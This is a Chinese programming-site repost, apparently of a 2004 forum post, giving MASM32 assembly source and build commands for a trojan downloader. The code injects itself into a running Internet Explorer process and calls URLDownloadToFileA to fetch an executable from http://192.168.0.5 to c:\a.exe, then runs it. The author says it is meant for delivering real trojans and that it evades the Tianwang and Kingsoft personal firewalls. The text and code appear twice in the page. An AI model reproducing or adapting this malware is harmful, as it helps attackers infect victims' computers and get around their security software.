教你注入下载文件的代码到IE进程然后下载的文件
程序员文章站
2022-09-09 08:28:45
大家可能都用过网页木马来下真正的EXE木马吧,但是有些时候
后门比较大下载的时候常常是网页暂停或是报错(CHM木马常遇到)
所以写了这个程序。。。。
程序还要改下才好用... 08-10-08...
大家可能都用过网页木马来下真正的exe木马吧,但是有些时候
后门比较大下载的时候常常是网页暂停或是报错(chm木马常遇到)
所以写了这个程序。。。。 程序还要改下才好用哈,不过只有2kb很小了。。。。 编绎参数:
c:\masm32\bin>type ii.bat
ml /c /coff i.asm
link /subsystem:windows i.obj 刚才测试了一下可以逃过天网的应用程序防问网络限制金山网镖也肯定没问题。
; #--------------------------------------# #
; # injection downloadcode in ie --> # #
; # -->also it can jump personal fire wall # #
; # 2004.07.15 #
; # codz: czy # #
; #------------------------------------------# # ;test on win2k server sp4 masm8 .386
.model flat,stdcall
option casemap:none include ../include/user32.inc
includelib ../lib/user32.lib
include ../include/kernel32.inc
includelib ../lib/kernel32.lib
include ../include/windows.inc
.data
hello db ’2k下建远程线程’,0
tit db ’ieframe’,0
szformat db ’pid是:%d’,0
szbuffer dd 20 dup(0),0
pid dd 0
hprocess dd 0
hthread dd 0
pcoderemote dd 0
path1 db ’c:\a.exe’,0 .const
szmsg db ’urldownloadtofilea’,0
userdll db ’urlmon.dll’,0
;szmsg db ’messageboxa’,0
;userdll db ’user32.dll’,0
szloadlib db ’loadlibrarya’,0 ;注意和loadlibraryw的区别哟
kerdll db ’kernel32.dll’,0 .code
codebegin:
dispdata db "http://192.168.0.5/nbtreelist.exe",0
sztit db "c:\a.exe",0
datalen =$-codebegin
rproc proc msgbox ;messageboxa的地址为参数
call @f ;push esi
@@:
pop ebx
sub ebx,offset @b
lea ecx,[ebx dispdata]
lea edx,[ebx sztit]
push null
push 0
push edx
push ecx
push null
call msgbox
ret ;重要
rproc endp
codelen =$-codebegin ;代码长度xx字节 start:
;invoke findwindow,0,offset tit ;返回计算器窗口句柄
invoke findwindow,offset tit,0
invoke getwindowthreadprocessid,eax,offset pid ;计算机器程序的进程pid号
;invoke wsprintf,offset szbuffer,offset szformat,pid ;把pid用十进制显示
invoke openprocess,process_all_access,false,pid ;打开进程,得到进程句柄
mov hprocess,eax ;保存进程句柄
invoke virtualallocex,hprocess,0, codelen, mem_commit, page_execute_readwrite
mov pcoderemote,eax
invoke writeprocessmemory,hprocess,pcoderemote,offset codebegin,codelen,null mov esi,pcoderemote
add esi,datalen
push esi
invoke loadlibrary,offset userdll
invoke getprocaddress,eax,offset szmsg
pop esi
invoke createremotethread,hprocess,0,0,esi,eax,0,0 mov hthread,eax ; 返回线程句柄
.if hthread
invoke waitforsingleobject,hthread, infinite ;等待线程结束
invoke closehandle,hthread ;关闭线程句柄
.endif invoke virtualfreeex,hprocess,pcoderemote,codelen,mem_release ;释放空间
invoke closehandle,hprocess ;关闭进程句柄
invoke winexec,offset path1,sw_show ;以正常方式执行下载的木马。。到时候改一下就没窗口了。。
;invoke messageboxa,0,offset szbuffer,offset szbuffer,1
invoke exitprocess,0
end start
后门比较大下载的时候常常是网页暂停或是报错(chm木马常遇到)
所以写了这个程序。。。。 程序还要改下才好用哈,不过只有2kb很小了。。。。 编绎参数:
c:\masm32\bin>type ii.bat
ml /c /coff i.asm
link /subsystem:windows i.obj 刚才测试了一下可以逃过天网的应用程序防问网络限制金山网镖也肯定没问题。
; #--------------------------------------# #
; # injection downloadcode in ie --> # #
; # -->also it can jump personal fire wall # #
; # 2004.07.15 #
; # codz: czy # #
; #------------------------------------------# # ;test on win2k server sp4 masm8 .386
.model flat,stdcall
option casemap:none include ../include/user32.inc
includelib ../lib/user32.lib
include ../include/kernel32.inc
includelib ../lib/kernel32.lib
include ../include/windows.inc
.data
hello db ’2k下建远程线程’,0
tit db ’ieframe’,0
szformat db ’pid是:%d’,0
szbuffer dd 20 dup(0),0
pid dd 0
hprocess dd 0
hthread dd 0
pcoderemote dd 0
path1 db ’c:\a.exe’,0 .const
szmsg db ’urldownloadtofilea’,0
userdll db ’urlmon.dll’,0
;szmsg db ’messageboxa’,0
;userdll db ’user32.dll’,0
szloadlib db ’loadlibrarya’,0 ;注意和loadlibraryw的区别哟
kerdll db ’kernel32.dll’,0 .code
codebegin:
dispdata db "http://192.168.0.5/nbtreelist.exe",0
sztit db "c:\a.exe",0
datalen =$-codebegin
rproc proc msgbox ;messageboxa的地址为参数
call @f ;push esi
@@:
pop ebx
sub ebx,offset @b
lea ecx,[ebx dispdata]
lea edx,[ebx sztit]
push null
push 0
push edx
push ecx
push null
call msgbox
ret ;重要
rproc endp
codelen =$-codebegin ;代码长度xx字节 start:
;invoke findwindow,0,offset tit ;返回计算器窗口句柄
invoke findwindow,offset tit,0
invoke getwindowthreadprocessid,eax,offset pid ;计算机器程序的进程pid号
;invoke wsprintf,offset szbuffer,offset szformat,pid ;把pid用十进制显示
invoke openprocess,process_all_access,false,pid ;打开进程,得到进程句柄
mov hprocess,eax ;保存进程句柄
invoke virtualallocex,hprocess,0, codelen, mem_commit, page_execute_readwrite
mov pcoderemote,eax
invoke writeprocessmemory,hprocess,pcoderemote,offset codebegin,codelen,null mov esi,pcoderemote
add esi,datalen
push esi
invoke loadlibrary,offset userdll
invoke getprocaddress,eax,offset szmsg
pop esi
invoke createremotethread,hprocess,0,0,esi,eax,0,0 mov hthread,eax ; 返回线程句柄
.if hthread
invoke waitforsingleobject,hthread, infinite ;等待线程结束
invoke closehandle,hthread ;关闭线程句柄
.endif invoke virtualfreeex,hprocess,pcoderemote,codelen,mem_release ;释放空间
invoke closehandle,hprocess ;关闭进程句柄
invoke winexec,offset path1,sw_show ;以正常方式执行下载的木马。。到时候改一下就没窗口了。。
;invoke messageboxa,0,offset szbuffer,offset szbuffer,1
invoke exitprocess,0
end start
上一篇: python连接池实现示例程序